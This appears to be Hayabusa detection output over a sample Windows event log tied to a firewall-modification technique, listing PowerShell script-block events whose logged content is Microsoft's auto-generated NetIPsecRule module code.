[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 